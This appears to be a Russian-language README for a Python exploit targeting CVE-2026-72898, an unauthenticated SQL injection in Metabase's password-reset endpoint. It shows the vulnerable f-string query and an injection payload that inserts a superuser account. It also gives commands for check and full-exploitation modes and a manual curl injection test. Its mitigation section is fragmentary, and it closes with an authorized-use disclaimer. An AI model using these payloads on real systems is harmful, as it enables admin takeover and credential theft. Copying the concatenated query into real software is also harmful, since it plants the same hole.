
Python-эксплойт для CVE-2026-72898 — неаутентифицированной SQL-инъекции в эндпоинте сброса пароля Metabase, позволяющей создавать учётные записи администратора и извлекать учётные данные базы данных.

Неаутентифицированная SQL-инъекция в эндпоинте Metabase /api/session/reset_password. Позволяет создавать учётные записи администратора и извлекать учётные данные базы данных.
Затронуто: v58.0 - v63.3 | Исправлено: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check
Конкатенация строк в SQL-запросе:
# Уязвимый код
query = f"SELECT * FROM core_user WHERE email='{email}'"
Полезная нагрузка атаки:
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --
Только проверка (без модификации):
python3 CVE-2026-72898.py http://localhost:5000 --check
Полная эксплуатация:
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!
Ручное тестирование:
# Проверка эндпоинта
curl http://localhost:5000/api/health
# Тест SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
-H "Content-Type: application/json" \
-d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'
СЕЙЧАС:
/api/session/reset_password через WAFПОЗЖЕ:
Только для авторизованного использования. Несанкционированный доступ незаконен.